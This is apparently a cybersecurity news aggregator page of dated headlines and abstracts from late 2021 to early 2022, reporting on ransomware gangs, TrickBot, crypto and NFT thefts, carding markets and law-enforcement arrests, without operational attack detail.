Abstract TrickBot, the infamous Windows crimeware-as-a-service (CaaS) solution that's used by a variety of threat actors to deliver next-stage payloads like ransomware, appears to be undergoing a transition of sorts, with no new activity recorded since the start of the year. The lull in the malware campaigns is "partially due to a big shift from Trickbot's operators, including working with the operators of Emotet," researchers from Intel 471  said  in a report shared with The Hacker News. The last set of attacks involving TrickBot were registered on December 28, 2021, even as command-and-control (C2) infrastructure associated with the malware has continued to serve additional plugins and  web injects  to infected nodes in the botnet. Interestingly, the decrease in the volume of the campaigns has also been accompanied by the TrickBot gang working closely with the  operators of Emotet , which witnessed a resurgence late last year after a 10-month-long break following law en

The Hacker News

February 23, 2022

Network hackers focus on selling high-value targets in the U.S. Full Text

Abstract A Crowdstrike report looking into access brokers' advertisements since 2019 has identified a preference in academic, government, and technology entities based in the United States.

BleepingComputer

February 22, 2022

Police bust phishing group that used 40 sites to steal credit cards Full Text

Abstract The Ukrainian cyberpolice have arrested a group of phishing actors who managed to steal payment card data from at least 70,000 people after luring them to fake mobile service top up sites.

BleepingComputer

February 22, 2022

Hackers Stole $1.7 Million Worth of NFTs from Users of OpenSea Marketplace Full Text

Abstract Malicious actors took advantage of a smart contract upgrade process in the OpenSea NFT marketplace to carry out a  phishing attack  against 17 of its users that resulted in the theft of virtual assets worth about $1.7 million. NFTs , short for non-fungible tokens, are digital tokens that act like certificates of authenticity for, and in some cases represent ownership of, assets that range from expensive illustrations to collectibles and physical goods. The opportunistic social engineering scam  swindled the users  by using the same email from OpenSea notifying users about the upgrade, with the copycat email redirecting the victims to a lookalike webpage, prompting them to sign a seemingly legitimate transaction, only to steal all the NFTs in one go. "By signing the transaction, an atomicMatch_ request would be sent to the attacker contract," Check Point researchers  explained . "From there, the atomicMatch_ would be forwarded to the OpenSea contract," leading t

The Hacker News

February 22, 2022

Police dismantled a gang that used phishing sites to steal credit cards Full Text

Abstract The Ukrainian police arrested a gang specialized in the sale of stolen payment card data through phishing attacks. The cybercrime unit of the Ukrainian police has arrested a group of cybercriminals who managed to steal payment card data from at least...

Security Affairs

February 20, 2022

Threat actors stole at least $1.7M worth of NFTs from tens of OpenSea users Full Text

Abstract Threat actors have stolen and flipped high-valued NFTs from the users of the world's largest NFT exchange, OpenSea. The world's largest NFT exchange, OpenSea on Sunday confirmed that tens of some of its users have been hit by a phishing attack and had lost...

Security Affairs

February 18, 2022

Conti ransomware gang takes over TrickBot malware operation Full Text

Abstract After four years of activity and numerous takedown attempts, the death knell of TrickBot has sounded as its top members move under new management, the Conti ransomware syndicate, who plan to replace it with the stealthier BazarBackdoor malware.

BleepingComputer

February 15, 2022

BlackCat (ALPHV) claims Swissport ransomware attack, leaks data Full Text

Abstract The BlackCat ransomware group, aka ALPHV, has claimed responsibility for the recent cyber attack on cargo and hospitality services giant Swissport that caused flight delays and service disruptions.

BleepingComputer

February 14, 2022

Spanish Police Arrest SIM Swappers Who Stole Money from Victims Bank Accounts Full Text

Abstract Spain's National Police Agency, the Policía Nacional, said last week it dismantled an unnamed cybercriminal organization and arrested eight individuals in connection with a series of SIM swapping attacks that were carried out with the goal of financial fraud. The suspects of the crime ring masqueraded as trustworthy representatives of banks and other organizations and used traditional phishing and smishing techniques to obtain personal information and bank data of victims before draining money from their accounts. "They usurped the identity of their victims through the falsification of official documents and tricked employees of telephone stores into getting the duplicate of SIM cards, cards where they received security confirmation messages from banks that allowed them to empty their victims' accounts," the authorities  said . Seven of the arrests were made in Barcelona and one in Seville. As many as 12 bank accounts were frozen as part of the illicit operation.

The Hacker News

February 14, 2022

Ransomware Becomes Deadlier, Conti Makes the Most Money Full Text

Abstract Ransomware actors are constantly upgrading their TTPs and finding new ways to make profits. A new report by Chainalysis states that ransomware victims spent almost $700 million in ransom in 2020.

Cyware Alerts - Hacker News

February 11, 2022

Spanish police dismantled SIM swapping gang who stole money from victims’ bank accounts Full Text

Abstract Spanish National Police arrested eight alleged members of a crime ring specialized in SIM swapping attacks. Spanish National Police has arrested eight alleged members of a crime organization who were able to steal money from the bank accounts of the victims...

Security Affairs

February 10, 2022

Spain dismantles SIM swapping group who emptied bank accounts Full Text

Abstract Spanish National Police has arrested eight suspects allegedly part of a crime ring who drained bank accounts in a series of SIM swapping attacks.

BleepingComputer

February 9, 2022

Ex-Gumshoe Nabs Cybercrooks with FBI Tactics Full Text

Abstract Crane Hassold, former FBI analyst turned director of threat intel at Abnormal Security, shares stories from his covert work tracking cyberattackers.

Threatpost

February 09, 2022

Russia Cracks Down on 4 Dark Web Marketplaces for Stolen Credit Cards Full Text

Abstract A special law enforcement operation undertaken by Russia has led to the seizure and shutdown of four online bazaars that specialized in the theft and sales of stolen credit cards, as the government continues to take active measures against harboring cybercriminals on its territory. To that end, the domains operated by the card fraud forms and marketplaces, Ferum Shop, Sky-Fraud, Trump's Dumps, and UAS, were confiscated and plastered with a banner that warned "theft of funds from bank cards is illegal." Also embedded into the HTML source code was a message asking, "Which one of you is next?" The seizures were orchestrated by the Department "K," a division of the Ministry of Internal Affairs of the Russian Federation that focuses primarily on information technology-related crimes, according to  Flashpoint . In a related development, state-owned news agency TASS  said  that six Russian individuals were being charged with "the illegal circulation o

The Hacker News

February 09, 2022

U.S. Arrests Two and Seizes $3.6 Billion Cryptocurrency Stolen in 2016 Bitfinex Hack Full Text

Abstract The U.S. Justice Department (DoJ) on Tuesday  announced  the arrest of a married couple in connection with conspiring to launder cryptocurrency worth $4.5 billion that was siphoned during the  hack  of the virtual currency exchange Bitfinex in 2016. Ilya Lichtenstein, 34, and his wife, Heather Morgan, 31, both of New York, are alleged to have "stolen funds through a labyrinth of cryptocurrency transactions," with the law enforcement getting hold of over $3.6 billion in cryptocurrency by following the money trails, resulting in the "largest financial seizure ever." "Bitfinex will work with the DoJ and follow appropriate legal processes to establish our rights to a return of the stolen bitcoin," the company  said  in a statement, adding "We have been cooperating extensively with the DoJ since its investigation began and will continue to do so." The laundering scheme involved moving proceeds of 119,754 bitcoin (BTC) from Bitfinex by initiating

The Hacker News

February 08, 2022

US seizes $3.6 billion stolen in 2016 Bitfinex cryptoexchange hack Full Text

Abstract The US Department of Justice announced that law enforcement seized billions worth of cryptocurrency linked to the 2016 Bitfinex cryptocurrency exchange hack.

BleepingComputer

February 8, 2022

Russian police arrested six people involved in the theft and selling of stolen credit cards Full Text

Abstract Russian police arrested six people individuals, allegedly members of a crime ring involved in the theft and selling of stolen credit cards. Another success of Russian police that arrested six people allegedly members of a crime gang involved in the theft...

Security Affairs

February 07, 2022

Russia arrests third hacking group, reportedly seizes carding forums Full Text

Abstract Russia arrested six people today, allegedly part of a hacking group that was involved in the theft and selling of stolen credit cards.

BleepingComputer

February 7, 2022

Cybercriminals Using SEO Poisoning To Spread Malware Full Text

Abstract A new SEO poisoning campaign drops Batloader and Atera Agent malware targeting users attempting to download productivity tools, such as Zoom, Visual Studio, and TeamViewer. The researchers claim that some techniques used in the campaigns match with those in the Conti playbooks. It is suggested to c ... Read More

Cyware Alerts - Hacker News

February 07, 2022

Russia arrests third hacking group, seizes carding forums Full Text

Abstract Russia arrested six people today, allegedly part of a hacking group that was involved in the theft and selling of stolen credit cards.

BleepingComputer

February 7, 2022

Ransomware groups and APT actors laser-focused on financial services Full Text

Abstract Despite a community reckoning to ban ransomware activity from online forums, hacker groups used alternate personas to proliferate the use of ransomware against an increasing spectrum of sectors

Help Net Security

February 06, 2022

Law enforcement action push ransomware gangs to surgical attacks Full Text

Abstract The numerous law enforcement operations leading to the arrests and takedown of ransomware operations in 2021 have forced threat actors to narrow their targeting scope and maximize the efficiency of their operations.

BleepingComputer

February 5, 2022

LockBit ransomware gang claims to have stolen data from PayBito crypto exchange Full Text

Abstract LockBit ransomware gang claims to have stolen customers' data from the PayBito crypto exchange. PayBito is a bitcoin and cryptocurrency exchange for major cryptocurrencies including Bitcoin Cash, Bitcoin, Ethereum, HCX, Litecoin, Ethereum Classic....

Security Affairs

February 4, 2022

Distrust, feuds building among ransomware groups Full Text

Abstract In an industry that operates in anonymity, trust is everything -- but recent accusations of ransomware actors working with or being law enforcement is threatening that work model.

Tech Target

February 3, 2022

Cybercriminals Bypass MFA, Stealing Browser Sessions Using MiTM Phishing Kits Full Text

Abstract Threat actors are using phish kits that leverage transparent reverse proxy, which enables them to man-in-the-middle (MitM) a browser session and steal credentials and session cookies in real-time.

Proof Point

February 2, 2022

Is REvil Active Even After Arrests? Full Text

Abstract Even after the recent arrest of the members of the REvil ransomware group, researchers have found multiple samples being deployed across targets.  After the arrests, the number of REvil implants dipped to 24 per day, but that again increased to 26 implants a day. Today, it is highly obscure wh ... Read More

Cyware Alerts - Hacker News

January 31, 2022

Hackers stole $80M worth of cryptocurrency from the Qubit DeFi platform Full Text

Abstract Threat actors stole $80M worth of cryptocurrency from the Qubit DeFi platform by exploiting a flaw in the smart contract code used in an Ethereum bridge. The DeFi platform Qubit Finance was victim of a cyber heist, threat actors stole around $80 million...

Security Affairs

January 30, 2022

DeepDotWeb News Site Operator Sentenced to 8 Years for Money Laundering Full Text

Abstract An Israeli national was sentenced to 97 months in prison in connection with operating the DeepDotWeb ( DDW ) clearnet website, nearly a year after the individual pleaded guilty to the charges. Tal Prihar, 37, an Israeli citizen residing in Brazil, is said to have played the role of an administrator of DDW since the website became functional in October 2013. He  pleaded guilty  to money laundering charges in March 2021 and agreed to forfeit the illegally amassed profits. DDW, until its seizure in May 2019, ostensibly  served  as a "news" website that connected internet users with underground marketplaces on the dark web that operate via darknets such as Tor, enabling the purchase of illegal firearms, malware and hacking tools, stolen financial data, heroin, fentanyl, and other illicit materials. Prihar, acting in cohorts with co-defendant Michael Phan, 34, of Israel, provided direct links to illegal marketplaces and in return for advertising these links, reaped substantia

The Hacker News

January 29, 2022

Jupyter: A Cyberspace Invader Stealing SLTT Data Full Text

Abstract Jupyter deploys a multi-stage process, leveraging PowerShell and legitimate tools, such as Slim PDF Reader, to drop secondary payloads to fingerprint victim information, including computer name, OS version, architecture, and user identifier.

CIS

January 28, 2022

Microsoft Outlook RCE zero-day exploits now selling for $400,000 Full Text

Abstract Exploit broker Zerodium has announced a pay jump to 400,000 for zero-day vulnerabilities that allow remote code execution (RCE) in Microsoft Outlook email client.

BleepingComputer

January 27, 2022

REvil Ransomware Operations Apparently Unaffected by Recent Arrests Full Text

Abstract The REvil ransomware cooperative’s activity has not slowed down following Russia’s recent move to arrest several alleged members of the group, according to threat intelligence company ReversingLabs.

Security Week

January 27, 2022

Lockbit ransomware gang claims to have hacked Ministry of Justice of France Full Text

Abstract A few hours ago Lockbit ransomware operators announced to have stolen data from Ministry of Justice of France. The Ministry of Justice of France is a body of the French government, which is responsible for: supervision of the judiciary, its maintenance...

Security Affairs

January 26, 2022

Telegram Becomes Viable Alternative to the Dark Web, Here’s How Attackers are Exploiting It Full Text

Abstract In a report from Cybersixgill, researchers revealed that compromised cards from most popular financial institutions are a lucrative commodity on Telegram-based illicit marketplaces.

Cyware Alerts - Hacker News

January 25, 2022

High anxiety spreads among Russian criminal groups in wake of REvil raid Full Text

Abstract The crackdown on members of the REvil gang by agents of Russian security forces this month is sending a wave of distress and dread through the Russian hacker underground, according to Trustwave.

CSO Online

January 25, 2022

Russia arrests leader of “Infraud Organization” hacker group Full Text

Abstract The Russian Federal Security Service (FSB) and law enforcement have arrested Andrey Sergeevich Novak, the alleged leader of the Infraud Organization, a hacker group that caused losses of more than $560 million in seven years of activity.

BleepingComputer

January 24, 2022

Russian authorities arrested the kingpin of cybercrime Infraud Organization Full Text

Abstract Russian authorities arrested four alleged members of the international cyber theft ring tracked as 'Infraud Organization.' In February 2008, the US authorities dismantled the global cybercrime organization tracked as Infraud Organization, which was involved...

Security Affairs

January 24, 2022

Ransomware gangs increase efforts to enlist insiders for attacks Full Text

Abstract A recent survey of 100 large (over 5,000 employees) North American IT firms shows that ransomware actors are making greater effort to recruit insiders in targeted firms to aid in attacks.

BleepingComputer

January 21, 2022

North Korean Hackers Stole Crypto Worth $400 Million in 2021 Full Text

Abstract A new report suggests that North Korean hackers mooched off at least $400 million in cryptocurrencies through cyberattacks in 2021, which is a whopping 40% increase as compared to the last year. Hackers use a systematic money laundering process that involves multiple software tools to collect ... Read More

Cyware Alerts - Hacker News

January 21, 2022

Conti ransomware gang started leaking files stolen from Bank Indonesia Full Text

Abstract The central bank of the Republic of Indonesia, Bank Indonesia, confirmed the ransomware attack that hit it in December. Bank Indonesia confirmed that it was the victim of a ransomware attack that took place last month. The Conti ransomware gang claimed...

Security Affairs

January 20, 2022

FBI links the Diavol ransomware to the TrickBot gang Full Text

Abstract The Federal Bureau of Investigation (FBI) officially linked the Diavol ransomware operation to the infamous TrickBot gang. The FBI officially linked the Diavol ransomware operation to the infamous TrickBot gang, the group that is behind the TrickBot...

Security Affairs

January 20, 2022

Interpol Busted 11 Members of Nigerian BEC Cybercrime Gang Full Text

Abstract A coordinated law enforcement operation has resulted in the arrest of 11 members allegedly belonging to a Nigerian cybercrime gang notorious for perpetrating business email compromise (BEC) attacks targeting more than 50,000 victims in recent years. The disruption of the BEC network is the result of a ten-day investigation dubbed  Operation Falcon II  undertaken by the Interpol along with participation from the Nigeria Police Force's Cybercrime Police Unit in December 2021. Cybersecurity firms  Group-IB  and Palo Alto Networks'  Unit 42 , both of which shared information on the threat actors and their infrastructure, said six of the 11 suspects are believed to be a part of a prolific group of Nigerian cyber actors known as SilverTerrier (aka TMT). BEC attacks, which began to gain dominance in 2013, are  sophisticated scams  that target legitimate business email accounts through social engineering schemes to infiltrate corporate networks and subsequently leverage their acce

The Hacker News

January 19, 2022

A Trip to the Dark Site — Leak Sites Analyzed Full Text

Abstract Gone are the days when ransomware operators were happy with encrypting files on-site and more or less discretely charged their victims money for a decryption key. What we commonly find now is encryption with the additional threat of leaking stolen data, generally called Double-Extortion (or, as we like to call it: Cyber Extortion or Cy-X). This is a unique form of cybercrime in that we can observe and analyze some of the criminal action via 'victim shaming' leak sites. Since January 2020, we have applied ourselves to identifying as many of these sites as possible to record and document the victims who feature on them. Adding our own research, analyzing, and enriching data scraped from the various Cy-X operators and market sites, we can provide direct insights into the victimology from this specific perspective. We must be clear that what we are analyzing is a limited perspective on the crime. Nevertheless, the data gleaned from an analysis of the leak-threats proves to be ex

The Hacker News

January 19, 2022

Cybercriminals Using QR Codes to Steal Money and Credentials from Victims Full Text

Abstract The bureau’s Internet Crime Complaint Center (IC3), issued a general alert Tuesday about “malicious” QR codes that reroute unsuspecting consumers to the world of cybercrime.

Cyberscoop

January 19, 2022

Nigerian police, Interpol arrest members of SilverTerrier BEC gang Full Text

Abstract Interpol said that, based on a forensic analysis of the data extracted from phones and computers seized during house searches, the 11 suspects were linked to attacks on more than 50,000 targets.

The Record

January 19, 2022

Interpol arrests 11 BEC gang members linked to 50,000 targets Full Text

Abstract Interpol, in coordination with the Nigerian Police Force, have arrested eleven individuals who are suspects of participating in an international BEC (business email compromise) ring.

BleepingComputer

January 18, 2022

Telegram is a hotspot for the sale of stolen financial accounts Full Text

Abstract Telegram is increasingly abused by cybercriminals to set up underground channels to sell stolen financial details to pseudonymous users.

BleepingComputer

January 18, 2022

AlphV/BlackCat ransomware gang published data stolen from fashion giant Moncler Full Text

Abstract Luxury fashion giant Moncler confirmed a data breach after a ransomware attack carried out by the AlphV/BlackCat. Moncler confirmed a data breach after an attack that took place in December. The luxury fashion giant was hit by AlphV/BlackCat...

Security Affairs

January 18, 2022

Europol Shuts Down VPNLab, Cybercriminals’ Favourite VPN Service Full Text

Abstract VPNLab.net, a  VPN provider  that was used by malicious actors to deploy ransomware and facilitate other cybercrimes, was taken offline following a coordinated law enforcement operation. Europol said it took action against the misuse of the VPN service by grounding 15 of its servers on January 17 and rendering it inoperable as part of a disruptive action that took place across Germany, the Netherlands, Canada, the Czech Republic, France, Hungary, Latvia, Ukraine, the U.S., and the U.K. A second outcome of the seizure is that at least 100 businesses that have been identified as at risk of impending cyber attacks are being notified. Europol didn't disclose the names of the companies. Established in 2008, the tool provided an advanced level of anonymity by offering double VPN connections to its clients — wherein the internet traffic is routed through two VPN servers located in different countries instead of one — for as cheap as $60 a year. "This made VPNLab.net a popular

The Hacker News

January 18, 2022

Cybercriminals Actively Target VMware vSphere with Cryptominers Full Text

Abstract VMware’s container-based application development environment has become attractive to cyberattackers.

Threatpost

January 17, 2022

Mespinoza/Pysa Ransomware Keeps Targeting Healthcare Sector Full Text

Abstract According to the HHS, PYSA ransomware operators are aggressively eying the healthcare sector in the U.S. to pull off double extortion attacks. As of November 2021, Pysa had already targeted 190 victims, of which six were from the healthcare sector. The sector should evaluate its defense-i ... Read More

Cyware Alerts - Hacker News

January 17, 2022

Dark Web’s Largest Marketplace for Stolen Credit Cards is Shutting Down Full Text

Abstract UniCC, the biggest dark web marketplace for stolen credit and debit cards, has announced that it's shuttering its operations after earning $358 million in purchases since 2013 using cryptocurrencies such as Bitcoin, Litecoin, Ether, and Dash. "Don't build any conspiracy theories about us leaving," the anonymous operators of UniCC said in a farewell posted on dark web carding forums, according to blockchain analytics firm Elliptic. "It is [a] weighted decision, we are not young and our health do[es] not allow [us] to work like this any longer." The UniCC team also gave its users 10 days to spend their balances, while also warning customers to "not follow any fakes tied to our comeback." Platforms such as UniCC function as an underground marketplace wherein credit card details stolen from online retailers, banks, and payments companies by injecting  malicious skimmers  are trafficked in exchange for cryptocurrency. The cards are then used by crim

The Hacker News

January 16, 2022

Threat actors stole $18.7M from the Lympo NTF platform Full Text

Abstract Threat actors hacked the hot wallet of the NFT platform Lympo and managed to steal 165.2 Million LMT (worth $18.7 million). NFT and DeFi platforms are privileged targets for cybercriminals, and the NFT platform Lympo was the last platform in order...

Security Affairs

January 15, 2022

One of the REvil members arrested by FSB was behind Colonial Pipeline attack Full Text

Abstract A senior Biden administration official said that the one of the Russian hacker arrested by FSB was behind the Colonial Pipeline attack. Yesterday, the Russian Federal Security Service (FSB) announced to have dismantled the REvil ransomware operation...

Security Affairs

January 15, 2022

At Request of U.S., Russia Rounds Up 14 REvil Ransomware Affiliates Full Text

Abstract The Russian government has arrested 14 people accused of working for “REvil,” a particularly aggressive ransomware group that has extorted hundreds of millions of dollars from victim organizations.

Krebs on Security

January 15, 2022

Russia Arrests REvil Ransomware Gang Responsible for High-Profile Cyber Attacks Full Text

Abstract In an unprecedented move, Russia's Federal Security Service (FSB), the country's principal security agency, on Friday disclosed that it arrested several members belonging to the notorious REvil ransomware gang and neutralized its operations. The surprise operation, which it said was carried out at the request of the U.S. authorities, saw the law enforcement agency conduct raids at 25 addresses in the cities of Moscow, St. Petersburg, Moscow, Leningrad and Lipetsk regions that belonged to 14 suspected members of the organized cybercrime syndicate. "In order to implement the criminal plan, these persons developed malicious software, organized the theft of funds from the bank accounts of foreign citizens and their cashing, including through the purchase of expensive goods on the Internet," the FSB  said  in a statement. In addition, the FSB seized over 426 million rubles, including in cryptocurrency, $600,000, €500,000, as well as computer equipment, crypto wallets

The Hacker News

January 15, 2022

Lorenz ransomware gang stole files from defense contractor Hensoldt Full Text

Abstract The Lorenz ransomware cybercrime gang has been active since April and hit multiple organizations worldwide demanding hundreds of thousands of dollars in ransoms to the victims.

Security Affairs

January 14, 2022

Top Illicit Carding Marketplace UniCC Abruptly Shuts Down   Full Text

Abstract UniCC controlled 30 percent of the stolen payment-card data market; leaving analysts eyeing what’s next.

Threatpost

January 14, 2022

Lorenz ransomware gang stolen files from defense contractor Hensoldt Full Text

Abstract German multinational defense contractor Hensoldt confirmed to that some of its systems were infected by Lorenz ransomware. Hensoldt, a multinational defense contractor, confirmed that some of its UK subsidiary's systems were infected with Lorenz ransomware....

Security Affairs

January 14, 2022

Former DHS official charged with stealing govt employees’ PII Full Text

Abstract A former Department of Homeland Security acting inspector general pleaded guilty today to stealing confidential and proprietary software and sensitive databases from the US government containing employees' personal identifying information (PII).

BleepingComputer

January 14, 2022

Husband-Wife Arrested in Ukraine for Ransomware Attacks on Foreign Companies Full Text

Abstract Ukrainian police authorities have nabbed five members of a gang that's believed to have helped orchestrate attacks against more than 50 companies across Europe and the U.S and caused losses to the tune of more than $1 million. The  special operation , which was carried out in assistance with law enforcement officials from the U.K. and U.S., saw the arrest of an unnamed 36-year-old individual from the capital city of Kyiv, along with his wife and three other accomplices. A total of nine searches across the suspects' homes were carried out, resulting in the seizure of computer equipment, mobile phones, bank cards, flash drives, three cars, and other items with evidence of illegal activity. The Cyber Police of the National Police of Ukraine said the group offered a "hacker service" that enabled financially motivated crime syndicates to send phishing emails containing file-encrypted malware to lock confidential data pertaining to its victims, demanding that the target

The Hacker News

January 14, 2022

Ukrainian police arrested Ransomware gang behind attacks on 50 companies Full Text

Abstract Ukrainian police arrested members of a ransomware gang that targeted at least 50 companies in the U.S. and Europe. Ukrainian police arrested members of a ransomware affiliate group that is responsible for attacking at least 50 companies in the U.S....

Security Affairs

January 14, 2022

FSB arrests REvil ransomware gang members Full Text

Abstract Raids were conducted by the Russian Federal Security Service (FSB) at 25 residents owned by 14 members suspected to be part of the REvil team across Moscow, St. Petersburg, Leningrad, and the Lipetsk regions.

The Record

January 14, 2022

Russia arrests REvil ransomware gang members, seize $6.6 million Full Text

Abstract The Federal Security Service (FSB) of the Russian Federation has announced today that they shut down the REvil ransomware gang after U.S. authorities reported on the leader.

BleepingComputer

January 13, 2022

North Korean hackers stole almost $400M in cryptocurrency, report says Full Text

Abstract North Korean hackers in 2021 stole nearly $400 million in cryptocurrency, according to a report released on Thursday, making it one of the most prolific years to date for cybercriminals in the isolated nation.

The Hill

January 13, 2022

BlueNoroff hackers steal crypto using fake MetaMask extension Full Text

Abstract The North Korean threat actor group known as 'BlueNoroff' has been spotted targeting cryptocurrency startups with malicious documents and fake MetaMask browser extensions.

BleepingComputer

January 13, 2022

Ukranian police arrests ransomware gang that hit over 50 firms Full Text

Abstract Ukrainian police officers have arrested a ransomware affiliate group responsible for attacking at least 50 companies in the U.S. and Europe.

BleepingComputer

January 12, 2022

Purple Fox Develops Complex Attack Chain for Persistence Full Text

Abstract Researchers uncovered cybercriminals using a malicious Telegram installer to drop Purple Fox Rootkit. It is believed to be spreading using email or probably via phishing websites. Phase-based operations and dependency on different files for each phase make this attacker go unnoticed from security s ... Read More

Cyware Alerts - Hacker News

January 12, 2022

SMEs still an easy target for cybercriminals Full Text

Abstract As per a new survey, 88% of businesses had at least one form of cybersecurity control in place, with 70% feeling fairly confident or extremely confident in their cybersecurity arrangements.

Help Net Security

January 7, 2022

AvosLocker Actors Seek Apology by Releasing Free Decryptor Full Text

Abstract The AvosLocker ransomware group has coughed up a free decryptor after learning that one of their victims was a U.S. police department. Hacker revealed that the taxpayer money is generally hard to get and hence, they usually avoid targeting government entities. Earlier this week, it was spotted with ... Read More

Cyware Alerts - Hacker News

January 6, 2022

Threat actors stole 1.1 million customer accounts from 17 well-known companies Full Text

Abstract NY OAG warned 17 companies that roughly 1.1 million of their customers have had their user accounts compromised in credential stuffing attacks. The New York State Office of the Attorney General (NY OAG) has warned 17 companies that roughly 1.1 million...

Security Affairs

January 5, 2022

‘Elephant Beetle’ Lurks for Months in Networks Full Text

Abstract The group blends into an environment before loading up trivial, thickly stacked, fraudulent financial transactions too tiny to be noticed but adding up to millions of dollars.

Threatpost

January 05, 2022

Broker-dealers impersonators stole $50 million using spoofed sites Full Text

Abstract A California man confirmed his role in a large-scale and long-running Internet-based fraud scheme that allowed him and other fraudsters to siphon roughly $50 million from dozens of investors over eight years, between 2012 to October 2020.

BleepingComputer

January 05, 2022

70 investors lose $50 million to fraudsters posing as broker-dealers Full Text

Abstract A California man confirmed his role in a large-scale and long-running Internet-based fraud scheme that allowed him and other fraudsters to siphon roughly $50 million from dozens of investors over eight years, between 2012 to October 2020.

BleepingComputer

January 05, 2022

NY OAG: Hackers stole 1.1 million customer accounts from 17 companies Full Text

Abstract The New York State Office of the Attorney General (NY OAG) has warned 17 well-known companies that roughly 1.1 million of their customers have had their user accounts compromised in credential stuffing attacks.

BleepingComputer

January 05, 2022

‘Elephant Beetle’ spends months in victim networks to divert transactions Full Text

Abstract A financially-motivated actor dubbed 'Elephant Beetle' is stealing millions of dollars from organizations worldwide using an arsenal of over 80 unique tools and scripts.

BleepingComputer

January 3, 2022

Lapsus$ Ransomware Gang Targets Impresa Media Group, Owner of SIC and Expresso Full Text

Abstract The Lapsus$ ransomware gang is extorting Impresa, the largest media conglomerate in Portugal and the owner of SIC and Expresso, the country’s largest TV channel and weekly newspaper, respectively.

The Record

January 2, 2022

Lapsus$ ransomware gang hits Impresa, Portugal’s largest media conglomerate Full Text

Abstract The Lapsus$ ransomware hit Impresa, the largest media conglomerate in Portugal and the owner of SIC and Expresso. The Lapsus$ ransomware gang has compromised the infrastructure of Impresa, the largest media conglomerate in Portugal. Impresa owns...

Security Affairs

January 2, 2022

North Korea-linked threat actors stole $1.7 billion from cryptocurrency exchanges Full Text

Abstract North Korea-linked threat actors are behind some of the largest cyberattacks against cryptocurrency exchanges. North Korea-linked APT groups are suspected to be behind some of the largest cyberattacks against cryptocurrency exchanges. According to South...

Security Affairs

December 30, 2021

AvosLocker ransomware gang releases a free decryptor after an affiliate hit US gov agency Full Text

Abstract The AvosLocker ransomware operators released a free decryptor after they accidentally encrypted the system of US Government entity. The AvosLocker ransomware operation provided a free decryptor after they encrypted the systems of a US government agency. https://twitter.com/pancak3lullz/status/1476217440442925057 According...

Security Affairs

December 29, 2021

Ransomware gang coughs up decryptor after realizing they hit the police Full Text

Abstract The AvosLocker ransomware operation provided a free decryptor after learning they encrypted a US government agency.

BleepingComputer

December 27, 2021

Dark web marketplace ToRReZ shuts down on their own’s decision Full Text

Abstract The operators of the ToRReZ dark web marketplace have shut down their operation claiming it is the result of their own’s decision. The operators of the ToRReZ dark web marketplace have shut down their operation before Christmas, claiming that it is the result...

Security Affairs

December 22, 2021

PYSA ransomware gang is the most active group in November Full Text

Abstract PYSA and Lockbit were the most active ransomware gangs in the threat landscape in November 2021, researchers from NCC Group report. Security researchers from NCC Group reported an increase in ransomware attacks in November 2021 over the past month,...

Security Affairs

December 21, 2021

Russian national extradited to US for trading on stolen Information Full Text

Abstract A Russian national was extradited to the US from Switzerland after he was charged for trading information stolen from hacked U.S. companies. The Russian national Vladislav Klyushin (41) was extradited to the United States from Switzerland to face...

Security Affairs

December 21, 2021

2easy now a significant dark web marketplace for stolen data Full Text

Abstract A dark web marketplace named '2easy' is becoming a significant player in the sale of stolen data "Logs" harvested from roughly 600,000 devices infected with information-stealing malware.

BleepingComputer

December 21, 2021

Russian hackers made millions by stealing SEC earning reports Full Text

Abstract A Russian national working for a cybersecurity company has been extradited to the U.S. where he is being charged for hacking into computer networks of two U.S.-based filing agents used by multiple companies to file quarterly and annual earnings through the Securities and Exchange Commissions (SEC) system.

BleepingComputer

December 20, 2021

Conti Ransomware Gang Has Full Log4Shell Attack Chain Full Text

Abstract Conti has become the first professional-grade, sophisticated ransomware group to weaponize Log4j2, now with a full attack chain.

Threatpost

December 20, 2021

Hackers Steal Over 1.8 Million People’s Credit Card Data from Sports Gear Websites Full Text

Abstract On Oct 15, these sites realized that they had been compromised, and on Nov 29, they notified their customers about this data breach in which the hackers have stolen over 1.8 million credit cards data.

GB Hackers

December 19, 2021

Clop ransomware gang is leaking confidential data from the UK police Full Text

Abstract Clop ransomware gang stolen confidential data from the UK police and leaked it in the dark web because the victim refused to pay the ransom Clop ransomware operators have stolen confidential information held by some British police, according to the media...

Security Affairs

December 17, 2021

Conti Gang Suspected of Ransomware Attack on McMenamins Full Text

Abstract The incident occurred last weekend at the popular chain of restaurants, hotels and breweries, which is still facing disruptions.

Threatpost

December 17, 2021

Conti ransomware gang exploits Log4Shell bug in its operations Full Text

Abstract The Conti ransomware gang is the first ransomware operation exploiting the Log4Shell vulnerability to target VMware vCenter Servers. Conti ransomware gang is the first professional race that leverages Log4Shell exploit to compromise VMware vCenter...

Security Affairs

December 16, 2021

How expired web domains help criminal hackers unlock enterprise defenses Full Text

Abstract Organizations allow domains to expire for a number of reasons. Sometimes it’s a simple mistake: a domain renewal is overlooked because a payment method has expired or the renewal contact has moved on.

The Daily Swig

December 15, 2021

FBI’s investigation accidentally revealed the HelloKitty ransomware gang operates out of Ukraine Full Text

Abstract While investigating a data breach suffered by a healthcare organization, FBI accidentally revealed that it believes that the HelloKitty ransomware gang operates out of Ukraine. The investigation conducted by FBI on a recent data breach suffered by an Oregon...

Security Affairs

December 15, 2021

Hackers Steal $140 Million from Users of Crypto Gaming Company Full Text

Abstract The hackers stole the private keys to access 96 wallets, siphoning off 4.5 million PYR, which is VulcanForge's token that can be used across its ecosystem, the company said in a series of tweets.

Vice

December 14, 2021

Forget the dark web: ransomware gangs weaponize social media to pressure victims Full Text

Abstract In an effort to amplify coverage, some ransomware groups are using social media channels to bring news of their conquests to a wider audience and put more pressure on victims to pay the ransom.

Emsisoft

December 13, 2021

Ransomware Affiliate Arrested in Romania; 51 Stolen Data Brokers Arrested in Ukraine Full Text

Abstract Europol, the European Union's premier law enforcement agency, has  announced  the arrest of a third Romanian national for his role as a ransomware affiliate suspected of hacking high-profile organizations and companies and stealing large volumes of sensitive data. The 41-year-old unnamed individual was apprehended Monday morning at his home in Craiova, Romania, by the Romanian Directorate for Investigating Organized Crime and Terrorism ( DIICOT ) following a joint investigation in collaboration with the U.S. Federal Bureau of Investigation (FBI). It's not currently known which ransomware gang the suspect was working with, but the development comes a little over a month after Romanian authorities  arrested two affiliates  of the REvil ransomware family, who are believed to have orchestrated no fewer than 5,000 ransomware attacks and extorted close to $600,000 from victims. Affiliates play a key role in ransomware-as-a-service (RaaS) subscription-based business models, and a

The Hacker News

December 13, 2021

Romanian ransomware suspect arrested in joint Europol, FBI operation Full Text

